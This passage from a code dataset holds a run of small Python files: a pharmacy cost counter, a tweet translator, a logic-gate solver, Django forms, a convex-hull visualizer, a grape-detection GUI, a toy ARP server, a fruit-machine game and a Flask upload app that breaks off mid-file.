range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n self.board_next = numpy.array([[0 for y in range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n\n def __init__(self):\n # Initalize arrays to zero\n self.board = numpy.array([[0 for y in range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n self.board_next = numpy.array([[0 for y in range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n \n \n \n","sub_path":"GameOfLife.py","file_name":"GameOfLife.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"169653580","text":"#!/usr/local/bin/python\r\nimport sys\r\nfrom collections import Counter\r\n\r\nsysIn = sys.argv\r\nfirst_name=[]\r\nlast_name=[]\r\ndrug_name=[]\r\ndrug_cost=[]\r\ntotal_cost=[]\r\ndrug_brand=[]\r\nnum_prescriber=[]\r\n\r\n\r\nwith open (sys.argv[1],'r') as f:\r\n lines = f.readlines()\r\n line_num = len(lines) \r\n \r\n for i in range (1,line_num):\r\n temp=lines[i].split('\\n')[0]\r\n drug_cost.append(temp.split(',')[-1])\r\n drug_name.append(temp.split(',')[-2])\r\n\r\ndruglist=Counter(drug_name).most_common()\r\nfor j in range (len(druglist)):\r\n drug_brand.append(druglist[j][0])\r\n num_prescriber.append(druglist[j][1]) \r\nfor j in range (len(druglist)):\r\n count=0\r\n indices = [i for i, x in enumerate(drug_name) if x == druglist[j][0]]\r\n for k in range (len(indices)):\r\n count=count+int(drug_cost[indices[k]])\r\n total_cost.append(count)\r\n \r\noutput=[drug_brand,num_prescriber,total_cost]\r\noutput1=list(map(list, zip(*output)))\r\noutput2=sorted(output1,key=lambda output1:(-output1[2],output1[0]))\r\n\r\noutput = open(sys.argv[2],'w')\r\noutput.write('drug_name,num_prescriber,total_cost\\n')\r\nfor row in output2:\r\n rowtxt = '{},{},{}'.format(row[0],row[1],row[2])\r\n output.write(rowtxt)\r\n output.write('\\n')\r\noutput.close()\r\n \r\n \r\n\r\n \r\n\r\n","sub_path":"src/pharmacy_counting.py","file_name":"pharmacy_counting.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"14344441","text":"# -*- coding: utf-8 -*-\nfrom google.cloud import translate\nimport src.database.DatabaseConnection as dc\nfrom src.preprocessing.PreprocessingTokens import removeStopwords\nimport 
csv\nimport time\n\n\ndef translate_text(text, target='en'):\n translate_client = translate.Client.from_service_account_json('apikey.json')\n result = translate_client.translate(text, target_language=target)\n tmp = []\n for row in result:\n tmp.append(row['translatedText'])\n return tmp\n\n\ndef makingTranslateData(game):\n listResult = []\n result = dc.getAllTweets(game)\n\n with open(f'../files/{game}2.csv', 'w+', encoding='utf-8') as csvfile:\n fieldnames = ['id', 'create_at', 'text', 'user_name', 'user_location']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n count = 0\n writer.writeheader()\n for item in result:\n id_tw, created_at, text, user_name, user_location = item\n removeEnters = text.replace('\\n', ' ')\n test = removeStopwords(removeEnters)\n item_list = [e for e in test if e not in '']\n\n if len(item_list) != 0:\n writer.writerow({'id': f'{id_tw}', 'create_at': f'{created_at}', 'text': f'{translate_text(item_list)}',\n 'user_name': f'{user_name}', 'user_location': f'{user_location}'})\n print(id_tw)\n count += 1\n\n if count == 300:\n time.sleep(20)\n count = 0\n\n print('ok')\n\n\nmakingTranslateData('BRACRC')\n","sub_path":"Extras/src/translateAPI/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"606582220","text":"import sys\n\nclass GateSolver:\n def __init__(self, filename):\n self.filename = filename\n self.operations = {\n \"AND\": lambda x, y: self.get_wire(x) & self.get_wire(y),\n \"OR\": lambda x, y: self.get_wire(x) | self.get_wire(y),\n \"NOT\": lambda x: 0xFFFF & ~(self.get_wire(x)),\n \"RSHIFT\": lambda x, y: self.get_wire(x) >> self.get_wire(y),\n \"LSHIFT\": lambda x, y: self.get_wire(x) << self.get_wire(y),\n }\n self.wire_outputs = {}\n self.gates = {}\n\n def get_gates_from_file(self):\n self.gates = {}\n try:\n with open(self.filename, \"r\") as input_file:\n for line in input_file.readlines():\n line = line.strip()\n if (line == \"\"):\n continue\n (operands, wire) = line.split(\" -> \")\n self.gates[wire] = operands.split(\" \")\n except FileNotFoundError:\n print(\"File \" + filename + \" not found\")\n return self.gates\n\n def get_wire(self, wire):\n if len(self.gates.keys()) == 0:\n self.gates = self.get_gates_from_file()\n if len(self.gates.keys()) == 0:\n return None\n\n if (wire.isnumeric()):\n return int(wire)\n\n if wire not in self.wire_outputs:\n operands = self.gates[wire]\n if len(operands) == 1:\n output = self.get_wire(operands[0])\n else:\n gate = operands.pop(-2)\n output = self.operations[gate](*operands)\n self.wire_outputs[wire] = output\n return self.wire_outputs[wire]\n\ndef main():\n if (len(sys.argv) > 1):\n filename = sys.argv[1]\n else:\n filename = \"input_file.txt\"\n solver = GateSolver(filename)\n print(\"Wire a:\", solver.get_wire(\"a\"))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"gate_solver.py","file_name":"gate_solver.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593608110","text":"from django import forms\n\nfrom .models import EventDetail, EventParticipant, EventTrainer\n\n\n# call for DatePickerInput\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass EventDetailForm(forms.ModelForm):\n\n class Meta:\n model = EventDetail\n fields = [\n 'title',\n 'start_date',\n 'end_date',\n 'registration_deadline',\n 'description',\n 'banner',\n 
'audience_type',\n            'max_audience',\n            'venue',\n            'venue_coordinate',\n            'region',\n            'currency',\n            'registration_fee',\n\n            'open_for_all',\n            'screening_process',\n            'registration_process',\n            'payment_process',\n            'additional_fees',\n            'review_event_host',\n        ]\n        widgets = {\n            'start_date': DateInput(),\n            'end_date': DateInput(),\n            'registration_deadline': DateInput(),\n        }\n\n        labels = {\n            'title': 'Event Title',\n            'start_date': 'Start Date',\n            'end_date': 'End Date',\n            'registration_deadline': 'Registration Deadline',\n            'description': 'Description',\n            'banner': 'Banner',\n            'audience_type': 'Audience Type',\n            'max_audience': 'Max Audience',\n            'venue': 'Venue',\n            'venue_coordinate': 'Venue Coordinate',\n            'region': 'Region',\n            'currency': 'Currency',\n            'registration_fee': 'Registration Fee',\n\n            'open_for_all': 'Open for all',\n            'screening_process': 'Screening Process',\n            'registration_process': 'Registration Process',\n            'payment_process': 'Payment Process',\n            'additional_fees': 'Additional Fees',\n            'review_event_host': 'Review Event Host'\n        }\n\n\nclass EventTrainerForm(forms.ModelForm):\n\n    class Meta:\n        model = EventTrainer\n        fields = [\n            'trainer',\n            'rating',\n            'status',\n        ]\n\n\nclass EventParticipantForm(forms.ModelForm):\n\n    class Meta:\n        model = EventParticipant\n        fields = [\n            'participant_id',\n            'registration_complete',\n            'is_selection_pass',\n            'payment_confirmed',\n            'review_participant',\n            'rating_participant',\n            'confirmation_text',\n            'participant_status',\n        ]\n","sub_path":"events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5388920","text":"from definitions import *\n\ndef graham_visualization(points, eps=10**-12, det=det):\n    #1. Find point with smallest y, x\n    p0 = min(points, key=flip)\n    allP = PointsCollection(points, 'gray')\n\n    #2. Sort remaining points\n    def partition(points):\n        pivot, *tail = points\n        low, high = [], []\n        ret_pivot = pivot\n        for p in tail:\n            d = orientation(p0, pivot, p, det, eps)\n            if d == INLINE:\n                if dist_sq(p0, p) > dist_sq(p0, ret_pivot):\n                    ret_pivot = p\n            elif d == CCW: high.append(p)\n            else: low.append(p)\n        return low, ret_pivot, high\n\n    def quick_sort(points):\n        if len(points) <= 1: return points\n        low, pivot, high = partition(points)\n        return quick_sort(low) + [pivot] + quick_sort(high)\n\n    #3. Initialize stack\n    p1, p2, *tail = quick_sort(points)\n    stack = [p0, p1, p2]\n\n
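    # (added) partition() orders the points by polar angle around p0 via the orientation\n    # predicate, keeping only the farthest of any collinear run (the dist_sq check)\n    # 4. 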
Execute the algorithm\n i, m = 0, len(tail)\n while i < m:\n pi = tail[i]\n yield Scene([\n allP,\n PointsCollection(stack, 'green'),\n ], [ \n LinesCollection(genLines(stack), 'blue'),\n LinesCollection([[stack[-1], pi]], 'red')\n ])\n if det(stack[-2], stack[-1], pi) > eps:\n stack.append(pi)\n i += 1\n else: stack.pop()\n\n yield Scene([ allP, PointsCollection(stack, 'green'), ], [\n LinesCollection(genLines(stack) + [[stack[-1], p0]], 'blue') \n ])\n","sub_path":"lab2/graham.py","file_name":"graham.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"52248755","text":"from random import shuffle\n\nliste = \"amazing excited gorgeous vibrant blazing fast stunning bold biggest fastest tremendous greatest best \\\n fantastic phenomenal delightful ambitious exciting staggering outstanding smarter massive incredible \\\n spectacular super excited super cool biggest magical revolutionary intuitive profound beautiful \\\n jaw-dropping\".upper().split()\nshuffle(liste)\n\nfor strophe in range(5):\n for n in range(2):\n for i in range(4):\n print(\"SPAM \", end='')\n print()\n print(\"{} SPAM, {} SPAM\".format(liste.pop(), liste.pop()) )\n print()","sub_path":"spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"449958231","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 18 00:34:21 2021\r\n\r\n@author: oookr\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nrect = (0,0,0)\r\nstartPoint = False\r\nendPoint = False\r\n\r\ndef mark(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print ('mark', event, x, y)\r\n cv2.circle( frame, (x,y), 60, (0,255,0), 1 )\r\n \r\n\r\ncap = cv2.VideoCapture('movingball.mp4')\r\nwaitTime = 25\r\n\r\n#Reading the first frame\r\n(grabbed, frame) = cap.read()\r\n\r\nwhile(cap.isOpened()):\r\n\r\n (grabbed, frame) = cap.read()\r\n\r\n cv2.namedWindow('frame')\r\n cv2.setMouseCallback('frame', mark) \r\n\r\n #drawing rectangle\r\n if startPoint == True and endPoint == True:\r\n cv2.circle( frame, (rect[0],rect[1]), rect[2], (0,255,0), 2 )\r\n \r\n\r\n cv2.imshow('frame',frame)\r\n\r\n key = cv2.waitKey(waitTime) \r\n\r\n if key ==ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"MWR_Object_tracking/videotracking.py","file_name":"videotracking.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244176703","text":"from typing import List, Dict\n\n\nclass TelegramUpdate:\n def __init__(self, data: dict):\n self.id = data['update_id']\n self.message = None\n if data.get('message'):\n self.message = Message(data['message'])\n if data.get('edited_message'):\n self.message = Message(data['edited_message'])\n self.callback_query = None\n if data.get('callback_query'):\n self.callback_query = CallbackQuery(data['callback_query'])\n\n\nclass Chat:\n def __init__(self, data: dict):\n self.id = data['id']\n self.type = data['type']\n\n\nclass TelegramUser:\n def __init__(self, data: dict):\n self.id = data['id']\n self.last_name = data.get('last_name', '')\n self.first_name = data.get('first_name', '')\n self.username = data.get('username', '')\n\n\nclass File:\n def __init__(self, data: dict):\n self.file_size = data['file_size']\n self.file_id = data['file_id']\n self.mime_type = 
data.get('mime_type')\n\n\nclass Photo(File):\n def __init__(self, data: dict):\n super().__init__(data)\n self.width = data['width']\n self.height = data['height']\n\n\nclass Video(File):\n def __init__(self, data: dict):\n super().__init__(data)\n\n\nclass Document(File):\n def __init__(self, data: dict):\n super().__init__(data)\n self.file_name = data.get('file_name', '')\n\n\nclass Voice(File):\n def __init__(self, data: dict):\n super().__init__(data)\n self.duration = data['duration']\n\n\nclass Location:\n def __init__(self, data: dict):\n self.latitude = data['latitude']\n self.longitude = data['longitude']\n\n\nclass Venue:\n def __init__(self, data: dict):\n self.foursquare_id = data.get('foursquare_id')\n self.address = data.get('address')\n self.title = data.get('title')\n self.location = Location(data['location'])\n\n\nclass Entity:\n def __init__(self, data: dict):\n self.type = data['type']\n self.length = data.get('length')\n self.offset = data.get('offset')\n\n\nclass Message:\n def __init__(self, data: dict):\n self.raw = data\n self.id = data['message_id']\n self.date = data['date']\n self.user = TelegramUser(data['from'])\n self.caption = data.get('caption')\n self.chat = Chat(data['chat'])\n self.text = data.get('text') or self.caption\n self.bot_commands = self.__get_bot_commands(data.get('entities', []),\n self.text)\n if data.get('photo'):\n self.photos = [\n Photo(photo_data) for photo_data in data.get('photo')\n ]\n if data.get('video'):\n self.video = Video(data['video'])\n if data.get('document'):\n self.document = Document(data['document'])\n if data.get('voice'):\n self.voice = Voice(data['voice'])\n if data.get('location'):\n self.location = Location(data['location'])\n if data.get('venue'):\n self.venue = Venue(data['venue'])\n\n def __get_bot_commands(self, entities: List[Dict], text: str):\n bot_cmd_entities = [entity for entity in entities\n if entity.get('type') == 'bot_command']\n return [\n text[entity['offset']:entity['offset'] + entity['length']]\n for entity in bot_cmd_entities\n ]\n\n\nclass CallbackQuery:\n def __init__(self, data: dict):\n self.id = data['id']\n self.user = TelegramUser(data['from'])\n self.message = Message(data['message'])\n self.inline_message_id = data.get('inline_message_id')\n self.data = data.get('data')\n","sub_path":"src/ext/telegram/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"493110051","text":"import math\nimport cv2\nimport PySimpleGUI as sg\nimport os.path\nimport numpy as np\n\n\ndef calculate_distance(boxes):\n\t'''Function to calculate the distance between the most left\n\tchunk and the most right chunk.\n\t'''\n\tmin = 10000\n\tmax = 0\n\n\t#gets the most left and most right x coordinate value\n\tfor box in boxes:\n\t\tif box[0] < min:\n\t\t\tmin = box[0]\n\t\t\tchunk1 = box\n\n\t\tif box[0] > max:\n\t\t\tmax = box[0]\n\t\t\tchunk2 = box\n\n\tpoint_chunk2_x = chunk2[0] + chunk2[2] #most right x coordinate\n\tpoint_chunk2_y = chunk2[1] + chunk2[3]/2 #height of most right bounding box divided by two\n\tpoint_chunk1_x = chunk1[0] #most left x coordinate\n\tpoint_chunk1_y = chunk1[1] + chunk1[3]/2 #height of most left bounding box divided by two\n\n\t#calculate the euclidean distance between the two points\n\tdistance = math.sqrt((point_chunk2_x - point_chunk1_x) ** 2 + (point_chunk2_y - point_chunk1_y) ** 2)\n\n\t#print(\"Calculated Distance: \", distance)\n\n\treturn distance, point_chunk1_x, point_chunk1_y, point_chunk2_x, 
point_chunk2_y\n\nif __name__ == \"__main__\":\n\t'''Building the Image Viewer ########################################################'''\n\t# First the window layout in 2 columns\n\tfile_list_column = [\n\t\t[\n\t\t\tsg.Text(\"Image Folder\"),\n\t\t\tsg.In(size=(25, 1), enable_events=True, key=\"-FOLDER-\"),\n\t\t\tsg.FolderBrowse(),\n\t\t],\n\t\t[\n\t\t\tsg.Listbox(\n\t\t\t\tvalues=[], enable_events=True, size=(40, 20), key=\"-FILE LIST-\"\n\t\t\t)\n\t\t],\n\t]\n\n\timage_viewer_column = [\n\t\t[sg.Text(\"Choose an image from list on left:\")],\n\t\t[sg.Text(size=(40, 1), key=\"-TOUT-\")],\n\t\t[sg.Image(key=\"-IMAGE-\")],\n\t]\n\n\t# ----- Full layout -----\n\tlayout = [\n\t\t[\n\t\t\tsg.Column(file_list_column),\n\t\t\tsg.VSeperator(),\n\t\t\tsg.Column(image_viewer_column),\n\t\t],\n\t\t[sg.Button(\"Detect\")],\n\t\t[sg.Button(\"Exit\")]\n\t]\n\n\twindow = sg.Window(\"Grape Detection Viewer\", layout)\n\t'''#############################################################################'''\n\n\n\tcfg = \"yolov4-custom.cfg\" #config file\n\tweights = \"yolov4-custom_best.weights\" #trained weights\n\tinput_size = (416, 416) #net input size\n\n\t#configure the network\n\tnet = cv2.dnn_DetectionModel(cfg, weights)\n\tnet.setInputSize(input_size)\n\tnet.setInputScale(1.0 / 255)\n\tnet.setInputSwapRB(True)\n\n\t#Application loop\n\twhile True:\n\t\tevent, values = window.read()\n\t\t#if the button Exit are pressed or the window closed, the application ends\n\t\tif event == \"Exit\" or event == sg.WIN_CLOSED:\n\t\t\tbreak\n\n\t\t# Folder name was filled in, make a list of files in the folder\n\t\tif event == \"-FOLDER-\":\n\t\t\tfolder = values[\"-FOLDER-\"]\n\t\t\ttry:\n\t\t\t\t# Get list of files in folder\n\t\t\t\tfile_list = os.listdir(folder)\n\t\t\texcept:\n\t\t\t\tfile_list = []\n\n\t\t\tfnames = [\n\t\t\t\tf\n\t\t\t\tfor f in file_list\n\t\t\t\tif os.path.isfile(os.path.join(folder, f))\n\t\t\t\t and f.lower().endswith((\".png\", \".gif\"))\n\t\t\t]\n\t\t\twindow[\"-FILE LIST-\"].update(fnames)\n\n\t\telif event == \"-FILE LIST-\": # A file was chosen from the listbox\n\t\t\ttry:\n\t\t\t\tfilename = os.path.join(\n\t\t\t\t\tvalues[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n\t\t\t\t)\n\t\t\t\twindow[\"-TOUT-\"].update(filename)\n\t\t\t\twindow[\"-IMAGE-\"].update(filename=filename) #update the window with the chosen image\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t#if the button Detect is pressed, the inference starts on the selected image\n\t\telif event == \"Detect\":\n\t\t\timage = cv2.imread(filename)\n\t\t\tclasses, confidences, boxes = net.detect(image, confThreshold=0.1, nmsThreshold=0.1)\t#make inference\n\n\t\t\twith open('obj.names', 'rt') as f:\n\t\t\t\tnames = f.read().rstrip('\\n').split('\\n')\n\n\t\t\t#calls the function to calculate distance\n\t\t\tdist, p1_x, p1_y, p2_x, p2_y = calculate_distance(boxes)\n\n\t\t\t#plot all the bounding boxes detected with its confidences\n\t\t\tfor classId, confidence, box in zip(classes.flatten(), confidences.flatten(), boxes):\n\t\t\t\tlabel = '%.2f' % confidence\n\t\t\t\tlabel = '%s: %s' % (names[classId], label)\n\t\t\t\tlabelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n\t\t\t\tleft, top, width, height = box\n\t\t\t\ttop = max(top, labelSize[1])\n\t\t\t\tcv2.rectangle(image, box, color=(0, 255, 0), thickness=3)\n\t\t\t\tcv2.rectangle(image, (left, top - labelSize[1]), (left + labelSize[0], top + baseLine), (255, 255, 255), cv2.FILLED)\n\t\t\t\tcv2.putText(image, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 
0.5, (0, 0, 0))\n\n\t\t\tcolor_line = (0,0,255)\n\t\t\tcolor_text = (255,255,255)\n\n\t\t\t#plot the line indicating the distance between the most left chunk and the most right\n\t\t\tcv2.line(image, (int(p1_x),int(p1_y)), (int(p2_x),int(p2_y)), color_line, 2)\n\n\t\t\t#plot information about the detection\n\t\t\tcv2.putText(image, \"Approximate distance in pixels: \" + str(np.round(dist)), (10, 30) , cv2.FONT_HERSHEY_SIMPLEX, 1, color_text, 2)\n\t\t\tcv2.putText(image, \"Number of Chunks detected : \" + str(len(boxes)), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, 1, color_text, 2)\n\t\t\tcv2.putText(image, \"Chunks per pixel rate: \" + str(np.round(len(boxes)/np.round(dist), 4)), (10, 90), cv2.FONT_HERSHEY_SIMPLEX, 1, color_text, 2)\n\n\t\t\t#update the image variable on the GUI application\n\t\t\timgbytes = cv2.imencode(\".png\", image)[1].tobytes()\n\t\t\twindow[\"-IMAGE-\"].update(data=imgbytes)\n\n\t\t\t#cv2.imshow(\"inference window\", image)\n\t\t\t#cv2.waitKey(0)\n\n\twindow.close() #close the image viewer","sub_path":"grape_detector.py","file_name":"grape_detector.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"549748241","text":"from flask import Blueprint,flash,redirect,render_template,url_for\r\nfrom jmilkfansblog.extensions import openid\r\nfrom jmilkfansblog.forms import LoginForm,OpenIDForm,RegisterForm\r\nfrom flask_login import login_user,logout_user\r\nfrom flask_principal import Identity, AnonymousIdentity, identity_changed, current_app\r\nfrom jmilkfansblog.models import User,db\r\nfrom uuid import uuid4\r\n\r\nad = Blueprint(\r\n 'main',\r\n __name__,\r\n template_folder='templates/admin',\r\n static_folder='static/admin',\r\n url_prefix='/main')\r\n\r\n\r\n# @ad.route('/')\r\n# def home():\r\n# return render_template('home.html')\r\n\r\n\r\n@ad.route('/register',methods=['GET','POST'])\r\ndef register():\r\n form = RegisterForm()\r\n if form.validate_on_submit():\r\n user = User(5,form.username.data,form.password.data)\r\n # user.id = str(uuid4)\r\n\r\n db.session.add(user)\r\n db.session.commit()\r\n flash('Your user has been registered',category='success')\r\n return redirect(url_for('main.login'))\r\n \r\n return render_template('main/register.html',form=form)\r\n\r\n\r\n\r\n@ad.route('/login', methods=['GET', 'POST'])\r\n@openid.loginhandler\r\ndef login():\r\n \"\"\"View function for login.\r\n\r\n Flask-OpenID will receive the authentication information\r\n from the relying party.\r\n \"\"\"\r\n\r\n # Create the object for LoginForm\r\n form = LoginForm()\r\n # Create the object for OpenIDForm\r\n openid_form = OpenIDForm()\r\n\r\n # Send the login request to the relying party (URL).\r\n if openid_form.validate_on_submit():\r\n return openid.try_login(\r\n openid_form.openid_url.data,\r\n ask_for=['nickname', 'email'],\r\n ask_for_optional=['fullname'])\r\n\r\n # Login at the relying party failed.\r\n openid_errors = openid.fetch_error()\r\n if openid_errors:\r\n flash(openid_errors, category=\"danger\")\r\n\r\n # Check whether the account is right.\r\n if form.validate_on_submit():\r\n\r\n # Using session to check the user's login status\r\n # Add the user's name to cookie.\r\n # session['username'] = form.username.data\r\n\r\n user = User.query.filter_by(username=form.username.data).one()\r\n\r\n # Use Flask-Login to process and check the login status for the user\r\n # Remember the user's login status. 
\r\n login_user(user, remember=form.remember.data)\r\n\r\n identity_changed.send(\r\n current_app._get_current_object(),\r\n identity=Identity(user.id))\r\n\r\n flash(\"You have been logged in.\", category=\"success\")\r\n return redirect(url_for('blog.home'))\r\n\r\n return render_template('main/login.html',\r\n form=form,\r\n openid_form=openid_form)\r\n\r\n\r\n@ad.route('/logout', methods=['GET', 'POST'])\r\ndef logout():\r\n \"\"\"View function for logout.\"\"\"\r\n\r\n # Remove the username from the cookie.\r\n # session.pop('username', None)\r\n\r\n # Using the Flask-Login to processing and check the logout status for user.\r\n logout_user()\r\n\r\n identity_changed.send(\r\n current_app._get_current_object(),\r\n identity=AnonymousIdentity())\r\n flash(\"You have been logged out.\", category=\"success\")\r\n return redirect(url_for('main.login'))","sub_path":"PycharmProjects/Reptile/Djang-flask/flask_ref/jmilkfansblog/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"252549405","text":"#programmes random from the library\r\nimport random\r\n#creates a list of values under the variable name symbols\r\nsymbols = [\"Cherry\",\"Bell\",\"Lemon\",\"Orange\",\"Star\",\"Skull\"]\r\n#gives the value of 100 to the variable user_credit\r\nuser_credit = 100\r\n#programmes it so that the variable SPIN haas a value of yes\r\nSPIN = \"yes\"\r\n#creates a loop so that while the user wants to spin and the user's credit is more than 0 then ...\r\nwhile SPIN == \"yes\" and user_credit > 0:\r\n #for every spin 20 is taken away from the user's credit\r\n user_credit = user_credit - 20\r\n #gives the variable spin 1 the value of a random value of the variable symbols\r\n spin1 = random.choice(symbols)\r\n #gives the variable spin 2 the value of a random value of the variable symbols\r\n spin2 = random.choice(symbols)\r\n #gives the variable spin 3 the value of a random value of the variable symbols\r\n spin3 = random.choice(symbols)\r\n #prints what the 3 spins are and what the user's creedit is after each go\r\n print(\"Spins :\",spin1,\",\",spin2,\",\",spin3,\"& Credit :\",user_credit)\r\n #if all 3 spins are Cherry then ...\r\n if spin1==\"Cherry\" and spin2==\"Cherry\" and spin3==\"Cherry\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! You have gained 50 credits.\")\r\n #if all 3 spins are Lemon then ...\r\n elif spin1==\"Lemon\" and spin2==\"Lemon\" and spin3==\"Lemon\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! You have gained 50 credits.\")\r\n #if all 3 spins are Orange then ...\r\n elif spin1==\"Orange\" and spin2==\"Orange\" and spin3==\"Orange\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! You have gained 50 credits.\")\r\n #if all 3 spins are Star then ...\r\n elif spin1==\"Star\" and spin2==\"Star\" and spin3==\"Star\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! 
You have gained 50 credits.\")\r\n #if all 3 spins are Bell then ...\r\n elif spin1==\"Bell\" and spin2==\"Bell\" and spin3==\"Bell\" :\r\n #user's credit increases by 100\r\n user_credit = user_credit + 100\r\n #tells the user they have gained 100 credits\r\n print(\"Well Done ! You have gained 100 credits.\")\r\n #if all 3 spins are Skull then ...\r\n elif spin1==\"Skull\" and spin2==\"Skull\" and spin3==\"Skull\" :\r\n #the user loses all of their credit\r\n user_credit = user_credit - user_credit\r\n #tells the user they have lost all their credit\r\n print(\"Bad Luck! You have lost all of your credits.\")\r\n #if 2 of the spins are Skull then ...\r\n elif spin1==\"Skull\" and spin2==\"Skull\" or spin1==\"Skull\" and spin3==\"Skull\" or spin2==\"Skull\" and spin3==\"Skull\" :\r\n #the user's credit decreases by 100\r\n user_credit = user_credit - 100\r\n #tells the user they have lost 100 credits\r\n print(\"Bad Luck! You have lost 100 credits.\")\r\n #gives the variable SPIN a second value of the outcome of the question \"Do you want to spin?\"\r\n SPIN = input(\"Do you want to spin?\")\r\n #if the user's credit is equal to or less than 0 / the user gave no answer then ...\r\n if user_credit <= 0 or SPIN == \"\":\r\n #SPIN gets a value of no which ends the loop\r\n SPIN = \"no\"\r\n \r\n\r\n\r\n","sub_path":"Fruit Machine Project.py","file_name":"Fruit Machine Project.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66506548","text":"import socket\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind(('127.0.0.1',2220))\ns.listen(1)\nipmac={\"10.1.1.8\":\"44:dd:22:11:33\",\"127.0.0.1\":\"33:aa:fe:4e:2d\",\"10.1.8.5\":\"23:a3:5d:33:9d\"}\n#print ipmac\nclient,address=s.accept()\nstr=client.recv(1024)\nout=ipmac[str]\nclient.send(out)\nstr=client.recv(1024)\nfor k in ipmac.keys():\n\tif ipmac[k]==str:\n\t\tclient.send(k)\ns.close()\n","sub_path":"exp6/arp_server.py","file_name":"arp_server.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177124864","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport os.path\nimport paramiko\nimport subprocess\nfrom ConfigParser import SafeConfigParser\nfrom flask import Flask, render_template, redirect, request, url_for, send_from_directory\nfrom werkzeug import secure_filename\n\napp = Flask(__name__)\n\n# set logger level\nlogging.basicConfig(level=logging.DEBUG)\nCONFIG_FILE = \"conf/config\"\n\n# DEFAULTS = {\n# 'debug': 'false',\n# 'host': '0.0.0.0',\n# }\n\n# Parsing config file\nif not os.path.exists(CONFIG_FILE):\n logging.info('Configuration file %s not found' % CONFIG_FILE)\n exit(65)\n\nconfig = SafeConfigParser()\n\n# Load the configuration file\nconfig.read(CONFIG_FILE)\nlogging.info('Reading configuration from %s' % CONFIG_FILE)\n\nserver_host = config.get('server_setting', 'host')\nserver_port = config.getint('server_setting', 'port')\nserver_debug = config.get('server_setting', 'debug')\n# This is the path to the upload directory\nuploaded_dir = config.get('server_setting', 'dir_upload')\n\n\n# These are the extensions that we are accepting to be uploaded\n# For a given file, return whether it's an allowed type or not\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1] in [config.get('server_setting', 'allow_extension')]\n\n\n# Render main page\n@app.route(\"/\")\ndef index():\n return render_template('index.html')\n # return redirect(url_for('login'))\n\n\n# Render login page\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n return render_template('login.html')\n\n\n# Route that will process the file upload\n@app.route('/upload', methods=['POST'])\ndef upload():\n # Get the name of the uploaded file\n file = request.files['file']\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n # Move the file form the temporal folder to\n # the upload folder we setup\n file.save(os.path.join(uploaded_dir, filename))\n # will basically show on the browser the uploaded file\n return redirect(url_for('uploaded_file', filename=filename))\n else:\n logging.info('Not allowed extensions for file %s' % file.filename)\n return render_template('404.html')\n\n\n# This route is expecting a parameter containing the name\n# of a file. Then it will locate that file on the upload\n# directory and show it on the browser, so if the user uploads\n# an image, that image is going to be show after the upload\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return 